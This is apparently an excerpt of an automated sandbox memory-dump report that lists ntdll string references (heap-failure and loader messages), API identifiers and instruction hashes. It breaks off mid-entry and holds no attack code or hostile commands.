                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x014d1c67
                                                                    0x014d1cdc
                                                                    0x014d1ce5
                                                                    0x014d1d04
                                                                    0x014d1d05
                                                                    0x014d1ce7
                                                                    0x014d1cfc
                                                                    0x014d1d01
                                                                    0x014d1d0b
                                                                    0x014d1d17
                                                                    0x014d1d1f
                                                                    0x014d1d25
                                                                    0x014d1d30
                                                                    0x014d1d4f
                                                                    0x014d1d50
                                                                    0x014d1d32
                                                                    0x014d1d47
                                                                    0x014d1d4c
                                                                    0x014d1d61
                                                                    0x014d1d67
                                                                    0x014d1d68
                                                                    0x014d1d6e
                                                                    0x014d1d79
                                                                    0x014d1d98
                                                                    0x014d1d99
                                                                    0x014d1d7b
                                                                    0x014d1d90
                                                                    0x014d1d95
                                                                    0x014d1daa
                                                                    0x014d1db0
                                                                    0x014d1db1
                                                                    0x014d1db7
                                                                    0x014d1dc2
                                                                    0x014d1de1
                                                                    0x014d1de2
                                                                    0x014d1dc4
                                                                    0x014d1dd9
                                                                    0x014d1dde
                                                                    0x014d1df3
                                                                    0x014d1df9
                                                                    0x014d1dfa
                                                                    0x014d1e00
                                                                    0x014d1e0a
                                                                    0x014d1e13
                                                                    0x014d1e32
                                                                    0x014d1e33
                                                                    0x014d1e15
                                                                    0x014d1e2a
                                                                    0x014d1e2f
                                                                    0x014d1e39
                                                                    0x014d1e4a
                                                                    0x014d1e02
                                                                    0x014d1e02
                                                                    0x014d1e08
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x014d1e08
                                                                    0x014d1e5b
                                                                    0x014d1e7a
                                                                    0x014d1e7b
                                                                    0x014d1e5d
                                                                    0x014d1e72
                                                                    0x014d1e77
                                                                    0x014d1e95

                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.716239904.00000000013F0000.00000040.00000001.sdmp, Offset: 013F0000, based on PE: true
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: Error code: %d - %s$HEAP: $HEAP[%wZ]: $Heap error detected at %p (heap handle %p)$Last known valid blocks: before - %p, after - %p$Parameter1: %p$Parameter2: %p$Parameter3: %p$Stack trace available at %p$heap_failure_block_not_busy$heap_failure_buffer_overrun$heap_failure_buffer_underrun$heap_failure_cross_heap_operation$heap_failure_entry_corruption$heap_failure_freelists_corruption$heap_failure_generic$heap_failure_internal$heap_failure_invalid_allocation_type$heap_failure_invalid_argument$heap_failure_lfh_bitmap_mismatch$heap_failure_listentry_corruption$heap_failure_multiple_entries_corruption$heap_failure_unknown$heap_failure_usage_after_free$heap_failure_virtual_block_corruption
                                                                    • API String ID: 0-2897834094
                                                                    • Opcode ID: 964bbce739156cfe8552618497ead3d2edc91ff713f8591b9968c49cfbc3cfb0
                                                                    • Instruction ID: f19dc59ed7b6c7245c59882b0f61a94ef8c04ab431949809efa19479aba9ca79
                                                                    • Opcode Fuzzy Hash: 964bbce739156cfe8552618497ead3d2edc91ff713f8591b9968c49cfbc3cfb0
                                                                    • Instruction Fuzzy Hash: 1C61C232521145DFEA12AB8BE495D2173B4EB19D30B1A843FFD096B371D73498529F0A
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Strings
                                                                    • Kernel-MUI-Language-SKU, xrefs: 01423F70
                                                                    • Kernel-MUI-Language-Disallowed, xrefs: 01423E97
                                                                    • Kernel-MUI-Number-Allowed, xrefs: 01423D8C
                                                                    • Kernel-MUI-Language-Allowed, xrefs: 01423DC0
                                                                    • WindowsExcludedProcs, xrefs: 01423D6F
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.716239904.00000000013F0000.00000040.00000001.sdmp, Offset: 013F0000, based on PE: true
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: Kernel-MUI-Language-Allowed$Kernel-MUI-Language-Disallowed$Kernel-MUI-Language-SKU$Kernel-MUI-Number-Allowed$WindowsExcludedProcs
                                                                    • API String ID: 0-258546922
                                                                    • Opcode ID: f9fcab7afcfc66626957c3857458a7075efd7f3d03a49803b3563cf945ca4168
                                                                    • Instruction ID: f7e88dc5f54007d93d63b07cc4ebcc855b6fb9a9c40def1bf3aadc6c1a3eb918
                                                                    • Opcode Fuzzy Hash: f9fcab7afcfc66626957c3857458a7075efd7f3d03a49803b3563cf945ca4168
                                                                    • Instruction Fuzzy Hash: EFF14D72D00629EFCB11DF99C984AEFBBB9FF58650F15005BE905A7221D7349E41CB90
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Strings
                                                                    • minkernel\ntdll\ldrsnap.c, xrefs: 0148933B, 01489367
                                                                    • Probing for the manifest of DLL "%wZ" failed with status 0x%08lx, xrefs: 0148932A
                                                                    • Querying the active activation context failed with status 0x%08lx, xrefs: 01489357
                                                                    • LdrpFindDllActivationContext, xrefs: 01489331, 0148935D
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.716239904.00000000013F0000.00000040.00000001.sdmp, Offset: 013F0000, based on PE: true
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: LdrpFindDllActivationContext$Probing for the manifest of DLL "%wZ" failed with status 0x%08lx$Querying the active activation context failed with status 0x%08lx$minkernel\ntdll\ldrsnap.c
                                                                    • API String ID: 0-3779518884
                                                                    • Opcode ID: 668ff99bfd426334844a41a93ba3ccd9a6ef2a5544126a2cbebba3a988db275f
                                                                    • Instruction ID: 20452a60f9f291281c09790130d6a770d7767c03b42614a63e061b0d7532a1be
                                                                    • Opcode Fuzzy Hash: 668ff99bfd426334844a41a93ba3ccd9a6ef2a5544126a2cbebba3a988db275f
                                                                    • Instruction Fuzzy Hash: 50412931A003179FFB36AADCC849A3776A5AB54678F26416FDA14D7371E770AC808381
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Strings
                                                                    • minkernel\ntdll\ldrsnap.c, xrefs: 01479C28
                                                                    • LdrpDoPostSnapWork, xrefs: 01479C1E
                                                                    • LdrpDoPostSnapWork:Unable to unsuppress the export suppressed functions that are imported in the DLL based at 0x%p.Status = 0x%x, xrefs: 01479C18
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.716239904.00000000013F0000.00000040.00000001.sdmp, Offset: 013F0000, based on PE: true
                                                                    Similarity
                                                                    • API ID: InitializeThunk
                                                                    • String ID: LdrpDoPostSnapWork$LdrpDoPostSnapWork:Unable to unsuppress the export suppressed functions that are imported in the DLL based at 0x%p.Status = 0x%x$minkernel\ntdll\ldrsnap.c
                                                                    • API String ID: 2994545307-1948996284
                                                                    • Opcode ID: 64e4f194ed839c4bdc77c80a96a5980e416cc96054c450318c1d0983f12c9d8a
                                                                    • Instruction ID: af5fa0cafa2ed75fe4f1026f491ed4c4acb9027601cbf86e3df66862d25511e2
                                                                    • Opcode Fuzzy Hash: 64e4f194ed839c4bdc77c80a96a5980e416cc96054c450318c1d0983f12c9d8a
                                                                    • Instruction Fuzzy Hash: 05911331A002279FEF18CF59C880ABE77F5FFA4314B85406FD901AB261E770A981CB90
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Strings
                                                                    • LdrpCompleteMapModule, xrefs: 01479898
                                                                    • minkernel\ntdll\ldrmap.c, xrefs: 014798A2
                                                                    • Could not validate the crypto signature for DLL %wZ, xrefs: 01479891
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.716239904.00000000013F0000.00000040.00000001.sdmp, Offset: 013F0000, based on PE: true
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: Could not validate the crypto signature for DLL %wZ$LdrpCompleteMapModule$minkernel\ntdll\ldrmap.c
                                                                    • API String ID: 0-1676968949
                                                                    • Opcode ID: 92b03e55c3b39f7b493dc401563ba8b17d418a908fadc4ef115ce7a3c35ec98c
                                                                    • Instruction ID: ff1103c405d7bac45d068c8b6d6029377b1d20577f166359879d1e338f3a24a1
                                                                    • Opcode Fuzzy Hash: 92b03e55c3b39f7b493dc401563ba8b17d418a908fadc4ef115ce7a3c35ec98c
                                                                    • Instruction Fuzzy Hash: 4D5101716007469BEB22CB5DC844B6A7BA4FF24335F4505ABE9519B3F1D730E981CB60
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Strings
                                                                    • \Registry\Machine\System\CurrentControlSet\Control\NLS\Language, xrefs: 0141E68C
                                                                    • @, xrefs: 0141E6C0
                                                                    • InstallLanguageFallback, xrefs: 0141E6DB
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.716239904.00000000013F0000.00000040.00000001.sdmp, Offset: 013F0000, based on PE: true
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: @$InstallLanguageFallback$\Registry\Machine\System\CurrentControlSet\Control\NLS\Language
                                                                    • API String ID: 0-1757540487
                                                                    • Opcode ID: 9afdc674460aa9cf08979233512fdf920bb30945e1070649362eb981bf87e44d
                                                                    • Instruction ID: 7bbf4f6b2bb674713883aa260f87982ffa1e59a31e7e88e56befe403bf075268
                                                                    • Opcode Fuzzy Hash: 9afdc674460aa9cf08979233512fdf920bb30945e1070649362eb981bf87e44d
                                                                    • Instruction Fuzzy Hash: 8A51A0766083069BD711DF29C440BABB7E8AF98614F04092FFA95EB360F734D904C7A2
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.716239904.00000000013F0000.00000040.00000001.sdmp, Offset: 013F0000, based on PE: true
                                                                    Similarity
                                                                    • API ID: InitializeThunk
                                                                    • String ID: Legacy$UEFI
                                                                    • API String ID: 2994545307-634100481
                                                                    • Opcode ID: 2e21d47cd285e7604d66445d1e33508923f4b0359bfd43d42c0dacb8c0b07275
                                                                    • Instruction ID: 3b5a1f38a337fcbf25ccfae2ffdeafd5cb543ea0165c039ccee313d5d82f4a50
                                                                    • Opcode Fuzzy Hash: 2e21d47cd285e7604d66445d1e33508923f4b0359bfd43d42c0dacb8c0b07275
                                                                    • Instruction Fuzzy Hash: 0E515D71A006099FDF25DFA9C940AAEBBB8BB58704F24406FE649EB261D6719901CB50
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0143B9A5
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.716239904.00000000013F0000.00000040.00000001.sdmp, Offset: 013F0000, based on PE: true
                                                                    Similarity
                                                                    • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                    • String ID:
                                                                    • API String ID: 885266447-0
                                                                    • Opcode ID: f50dca5f8fd329008ca4850fd781903f9777fb8cda672dcb29a0457e38d088df
                                                                    • Instruction ID: 9726ba474e09f06d3783557b958dcbabd7ab92a1deec47667f9d5690bf67cf32
                                                                    • Opcode Fuzzy Hash: f50dca5f8fd329008ca4850fd781903f9777fb8cda672dcb29a0457e38d088df
                                                                    • Instruction Fuzzy Hash: B8517571A08701CFC721DF69C480A2BBBE5FBD8210F15896FEA9587365DB30E845CB82
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.716239904.00000000013F0000.00000040.00000001.sdmp, Offset: 013F0000, based on PE: true
                                                                    Similarity
                                                                    • API ID: _vswprintf_s
                                                                    • String ID:
                                                                    • API String ID: 677850445-0
                                                                    • Opcode ID: b481d7043cddef5d1201d7a43974e3e671a7b136aadc1bfcebbae77ad3002ea0
                                                                    • Instruction ID: 29bdaa1ebf871757f605eac1e01579fd862776ff1f856daf9c676287d445102b
                                                                    • Opcode Fuzzy Hash: b481d7043cddef5d1201d7a43974e3e671a7b136aadc1bfcebbae77ad3002ea0
                                                                    • Instruction Fuzzy Hash: DD51CFB5D002598EEB31CF78C844BFEBBB1AF04714F1941AEE859AB3A2D7704945CB91
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.716239904.00000000013F0000.00000040.00000001.sdmp, Offset: 013F0000, based on PE: true
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: PATH
                                                                    • API String ID: 0-1036084923
                                                                    • Opcode ID: 5ceabc746b9071f4a9ca06a3305ed0d1533282a7c161270d96ccf8a2355477a5
                                                                    • Instruction ID: 86d2177a97157f541e981b081f89cd6aad26072f295d1c0a004f7854f46680a9
                                                                    • Opcode Fuzzy Hash: 5ceabc746b9071f4a9ca06a3305ed0d1533282a7c161270d96ccf8a2355477a5
                                                                    • Instruction Fuzzy Hash: F2C1A275D00219DBEB25DF99E880EAEBBB1FF58740F05402EF905AB360D774A946CB60
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Strings
                                                                    • *** ASSERT FAILED: Input parameter LanguagesBuffer for function RtlSetThreadPreferredUILanguages is not a valid multi-string!, xrefs: 0148BE0F
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.716239904.00000000013F0000.00000040.00000001.sdmp, Offset: 013F0000, based on PE: true
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: *** ASSERT FAILED: Input parameter LanguagesBuffer for function RtlSetThreadPreferredUILanguages is not a valid multi-string!
                                                                    • API String ID: 0-865735534
                                                                    • Opcode ID: 0bc2d85dfec99fcb844596a4fffa987159296a60ffeebc1674bbe5f32b601de6
                                                                    • Instruction ID: a85c2053cab8b5aced3e9f2f64a15ced50f6588ff10650aff2f58e8121de6c09
                                                                    • Opcode Fuzzy Hash: 0bc2d85dfec99fcb844596a4fffa987159296a60ffeebc1674bbe5f32b601de6
                                                                    • Instruction Fuzzy Hash: 53A1E271A00A068FFB22DE6DC450B7FB7A4FB59620F04456FD9469B7A1DB30D84A8B90
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.716239904.00000000013F0000.00000040.00000001.sdmp, Offset: 013F0000, based on PE: true
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: RTL: Re-Waiting
                                                                    • API String ID: 0-316354757
                                                                    • Opcode ID: ee499a998f9874af35bd64052d083bb9820ddd40be7b42d11d43601c7cd1b431
                                                                    • Instruction ID: d6ba0a09f05c1b2e576f9f17234bd12b6976c8c41787550f31e1d4d4a8e0670d
                                                                    • Opcode Fuzzy Hash: ee499a998f9874af35bd64052d083bb9820ddd40be7b42d11d43601c7cd1b431
                                                                    • Instruction Fuzzy Hash: 01614571A006059FEB22DB6CD850B7F7BA9EB54328F24066BD991D73F1C77099068782
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.716239904.00000000013F0000.00000040.00000001.sdmp, Offset: 013F0000, based on PE: true
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: `
                                                                    • API String ID: 0-2679148245
                                                                    • Opcode ID: 4212a11a86a8936650cc6003a78b37d5090716168ef257cec554fc1abea7ff61
                                                                    • Instruction ID: c99f34b9c649d87614b3a875862450b5d3c0bb5146790fe9f3194eb2f93b9c69
                                                                    • Opcode Fuzzy Hash: 4212a11a86a8936650cc6003a78b37d5090716168ef257cec554fc1abea7ff61
                                                                    • Instruction Fuzzy Hash: 5C51D0B13043428FD725DF19D898B1BBBE5EBC4715F04092EFA92876A0D670E806CB61
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.716239904.00000000013F0000.00000040.00000001.sdmp, Offset: 013F0000, based on PE: true
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: @
                                                                    • API String ID: 0-2766056989
                                                                    • Opcode ID: 4b412e15f740e7d19b187a206102b9820fe056b1c8be356b654954a4ccb32fe9
                                                                    • Instruction ID: 3f0993274e2bb8bd850b33639d528a84ccca839db0a169ab78e29635c4ca9aa9
                                                                    • Opcode Fuzzy Hash: 4b412e15f740e7d19b187a206102b9820fe056b1c8be356b654954a4ccb32fe9
                                                                    • Instruction Fuzzy Hash: 4D519F71504711AFD321DF19C840A6BBBF8FF98710F00892EFA95976A0E7B4E914CBA1
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.716239904.00000000013F0000.00000040.00000001.sdmp, Offset: 013F0000, based on PE: true
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: BinaryHash
                                                                    • API String ID: 0-2202222882
                                                                    • Opcode ID: 071f2fb77feeb74da92f3acf6a2218cb7afac68673731aa5e32dfc328422bf25
                                                                    • Instruction ID: a2e9c85940e9e1f7f33f2321dbd79a55feb0fc3265995a83189d25e2b13bd918
                                                                    • Opcode Fuzzy Hash: 071f2fb77feeb74da92f3acf6a2218cb7afac68673731aa5e32dfc328422bf25
                                                                    • Instruction Fuzzy Hash: D64198B1D0052D9BDF21DE60CC84FDEBB7CAB55714F0041AAEA09AB251DB305E88CF95
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.716239904.00000000013F0000.00000040.00000001.sdmp, Offset: 013F0000, based on PE: true
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: `
                                                                    • API String ID: 0-2679148245
                                                                    • Opcode ID: 39b8bc2de1f442ef1f569125be10905dd0dd778863a6d43cfec09233fd0d58f3
                                                                    • Instruction ID: 09a1c8f0c1de8ef5c485b98bcb1bdc8d98708f5ebd7129163f1e140a67e7c690
                                                                    • Opcode Fuzzy Hash: 39b8bc2de1f442ef1f569125be10905dd0dd778863a6d43cfec09233fd0d58f3
                                                                    • Instruction Fuzzy Hash: BC3106327003466BE710DE29CC49F977BD9EBD4754F14412AFA689B2A0D7B0E904CB91
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.716239904.00000000013F0000.00000040.00000001.sdmp, Offset: 013F0000, based on PE: true
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: BinaryName
                                                                    • API String ID: 0-215506332
                                                                    • Opcode ID: 842c729e0107bbc511af2e56da9c7fad752e76bc2b8879651c73e0395018ceac
                                                                    • Instruction ID: a4336ff7408c998509067becf7deaef63b96e1a4a76acf65bc9f4d228c0b14fc
                                                                    • Opcode Fuzzy Hash: 842c729e0107bbc511af2e56da9c7fad752e76bc2b8879651c73e0395018ceac
                                                                    • Instruction Fuzzy Hash: A731D17290051AAFEF15DF69C945E7BBFB4FB92B20F01416AE918A7361D7309E04C7A0
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.716239904.00000000013F0000.00000040.00000001.sdmp, Offset: 013F0000, based on PE: true
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: @
                                                                    • API String ID: 0-2766056989
                                                                    • Opcode ID: 2ad76339db4981c3d9d8b8c4c0e3e8b95b8eb4fbd6ce32d7652d71546bd1c12d
                                                                    • Instruction ID: cb660e6d652d8113f93fecbb67596480eadf786c057941257371f145f1575ab5
                                                                    • Opcode Fuzzy Hash: 2ad76339db4981c3d9d8b8c4c0e3e8b95b8eb4fbd6ce32d7652d71546bd1c12d
                                                                    • Instruction Fuzzy Hash: 4731B3B19087059FE311DFA9C88095BBBE8EBE9654F00092FF99483220D734DD05CB92
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.716239904.00000000013F0000.00000040.00000001.sdmp, Offset: 013F0000, based on PE: true
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: WindowsExcludedProcs
                                                                    • API String ID: 0-3583428290
                                                                    • Opcode ID: 1bf07565f9293903005a3f3a42acb8b910e30ddc7b9aa6256cfa4b1325e2faca
                                                                    • Instruction ID: a1cc359057f5f1b77965e30645a5c1405f3adcd276c51a3128cdac0c1c892408
                                                                    • Opcode Fuzzy Hash: 1bf07565f9293903005a3f3a42acb8b910e30ddc7b9aa6256cfa4b1325e2faca
                                                                    • Instruction Fuzzy Hash: B921F57A500239ABDB329E5A8844F9FBBADEF90A51F554427FE048B320DA30DC0197E0
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.716239904.00000000013F0000.00000040.00000001.sdmp, Offset: 013F0000, based on PE: true
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: Actx
                                                                    • API String ID: 0-89312691
                                                                    • Opcode ID: f0d8f8e21f414f082f1a737728027507774d1d611624e1b6d7b8d018bc7d4969
                                                                    • Instruction ID: 0c08c953909a65e269e6d19bff360dc971ff63113837d69aebb3d12c37254cbe
                                                                    • Opcode Fuzzy Hash: f0d8f8e21f414f082f1a737728027507774d1d611624e1b6d7b8d018bc7d4969
                                                                    • Instruction Fuzzy Hash: FB11D038F046028BFB275E1D8490B377695ABCD224F24453BE565CB3B1DB70D80A8743
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Strings
                                                                    • Critical error detected %lx, xrefs: 014C8E21
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.716239904.00000000013F0000.00000040.00000001.sdmp, Offset: 013F0000, based on PE: true
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: Critical error detected %lx
                                                                    • API String ID: 0-802127002
                                                                    • Opcode ID: 631c87cdc32722660976e827b93f17ece5f756e9ad94be93c4b8102cdcd90c8c
                                                                    • Instruction ID: b365dd6dd76c0a80cbaa7256ffb2aaf744c6ee9dc22b86c76826755225eba487
                                                                    • Opcode Fuzzy Hash: 631c87cdc32722660976e827b93f17ece5f756e9ad94be93c4b8102cdcd90c8c
                                                                    • Instruction Fuzzy Hash: 7E117975D10349DADB29CFEA89057ADBBB4AB54724F20421ED168AB3A2C3340602CF15
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Strings
                                                                    • NTDLL: Calling thread (%p) not owner of CritSect: %p Owner ThreadId: %p, xrefs: 014AFF60
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.716239904.00000000013F0000.00000040.00000001.sdmp, Offset: 013F0000, based on PE: true
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: NTDLL: Calling thread (%p) not owner of CritSect: %p Owner ThreadId: %p
                                                                    • API String ID: 0-1911121157
                                                                    • Opcode ID: 3a585cad95a715fda0e2b6a30aa82384e99510790e8f2d2f67cc44b797e3eccc
                                                                    • Instruction ID: c9edee4fbbbef650309c7c3424ed35df498e8f9cd89c366edaddfcdb31b0d8ff
                                                                    • Opcode Fuzzy Hash: 3a585cad95a715fda0e2b6a30aa82384e99510790e8f2d2f67cc44b797e3eccc
                                                                    • Instruction Fuzzy Hash: F2112171A20144EFDB22DF94C848F9D7BB1BF28704F52805AF1046B2B1C7789944DB90
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.716239904.00000000013F0000.00000040.00000001.sdmp, Offset: 013F0000, based on PE: true
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 5f6c4598f26f94f2aeac4417664fefd573327ed5d46efb7825342ff28d3f6419
                                                                    • Instruction ID: 3ad6f594507fc3b747c89767d00c9314ab7d26d2f54edb6f22dfdd14894e747a
                                                                    • Opcode Fuzzy Hash: 5f6c4598f26f94f2aeac4417664fefd573327ed5d46efb7825342ff28d3f6419
                                                                    • Instruction Fuzzy Hash: 51425775A00229CFDB20CF68C884BAABBF1FF59305F1581AAD94DAB352D7309985CF50
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.716239904.00000000013F0000.00000040.00000001.sdmp, Offset: 013F0000, based on PE: true
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 5d8dec91d1b9acb85c7551510faedca07a17d0e412869f6d961d406b07716296
                                                                    • Instruction ID: b5f9cc5ec659e2cc64b515aaabb4b7ba04072ce079c05fc7c16c06de6081d86f
                                                                    • Opcode Fuzzy Hash: 5d8dec91d1b9acb85c7551510faedca07a17d0e412869f6d961d406b07716296
                                                                    • Instruction Fuzzy Hash: DDF17D706082118BC724CF59C480ABBBBE1EF98754F18496FF986DB3A1E734D985CB52
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.716239904.00000000013F0000.00000040.00000001.sdmp, Offset: 013F0000, based on PE: true
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: f1d92e7f6167ff9d57bd6b3725743afa6b4c6ce822891d11607f0d99b4b55cab
                                                                    • Instruction ID: 0f36e92cec37efc11614a0c9fed09da3de6b40007aa7ce5a877cd8e4532eaf75
                                                                    • Opcode Fuzzy Hash: f1d92e7f6167ff9d57bd6b3725743afa6b4c6ce822891d11607f0d99b4b55cab
                                                                    • Instruction Fuzzy Hash: C8F1E031A083419FE726DB2CD840B6BBBE1BB95314F05852FF9959B3A1D7B4D841CB82
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.716239904.00000000013F0000.00000040.00000001.sdmp, Offset: 013F0000, based on PE: true
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 8a4b1d0ca3a1231dd133e3591bf62801c8d1cc754eedfe27a0bee79c3547460e
                                                                    • Instruction ID: 4ac65f228a9a11f927696b02fac8dec5071f2a329cb9fa7fa4b9089cdf4c3d29
                                                                    • Opcode Fuzzy Hash: 8a4b1d0ca3a1231dd133e3591bf62801c8d1cc754eedfe27a0bee79c3547460e
                                                                    • Instruction Fuzzy Hash: 0BE1E330E0036A8FEB35CF99C884BAAB7B1BF95304F4501ABD9099B3A1D77499C5CB51
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.716239904.00000000013F0000.00000040.00000001.sdmp, Offset: 013F0000, based on PE: true
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 16eaf3e7f5145e845dfedc54a9afbcae4a23f445bf3480b9199b382fcf9c5f79
                                                                    • Instruction ID: 0e9ff8d4f37887fb911412a62f8c9f0c234cc6290369eb5836c9d396a6d88488
                                                                    • Opcode Fuzzy Hash: 16eaf3e7f5145e845dfedc54a9afbcae4a23f445bf3480b9199b382fcf9c5f79
                                                                    • Instruction Fuzzy Hash: B2B15B70E0021ADFDB25DFE9C980AAEBBF5BF58304F50412EE505AB365D770A886CB50
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.716239904.00000000013F0000.00000040.00000001.sdmp, Offset: 013F0000, based on PE: true
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 5a0bb5f0dcc30644251ddd94a74a28c35d495ae1b1b8d397001f5f5e416e537d
                                                                    • Instruction ID: 46506d174764993e7c28ed9060c7312a5433c6e6d247caf80d8bf28cb6401eda
                                                                    • Opcode Fuzzy Hash: 5a0bb5f0dcc30644251ddd94a74a28c35d495ae1b1b8d397001f5f5e416e537d
                                                                    • Instruction Fuzzy Hash: 81C122755083818FE755CF28C580A6AFBF1BF88304F14496EF9998B362D771E845CB42
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.716239904.00000000013F0000.00000040.00000001.sdmp, Offset: 013F0000, based on PE: true
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: d3aea14ce104d49394c2a23ad321abbce7e0aec453f15556bff73d902aceca08
                                                                    • Instruction ID: 9309e9b25ca9751c657673a2a081fd30817dd0fb67ee171f9f8a68e6447649f8
                                                                    • Opcode Fuzzy Hash: d3aea14ce104d49394c2a23ad321abbce7e0aec453f15556bff73d902aceca08
                                                                    • Instruction Fuzzy Hash: 7A910831E002169BFB22AA6DC844BAE7BE4EB15724F090267FA50AB3F1D7749D11C781
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.716239904.00000000013F0000.00000040.00000001.sdmp, Offset: 013F0000, based on PE: true
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 9b7fa78d8b27df8f9fae35e57d174d4419b61578ac8494a9e53a4489c0dd4e3a
                                                                    • Instruction ID: 205b46df6c3db27a8b27f2f7264d0700b465c4f069e0acd800071f7971044c87
                                                                    • Opcode Fuzzy Hash: 9b7fa78d8b27df8f9fae35e57d174d4419b61578ac8494a9e53a4489c0dd4e3a
                                                                    • Instruction Fuzzy Hash: 9781B676A44201CBDB22EE58C8A0A7FB7E5EB84355F24481FEE458B361D330ED41C7A1
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.716239904.00000000013F0000.00000040.00000001.sdmp, Offset: 013F0000, based on PE: true
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
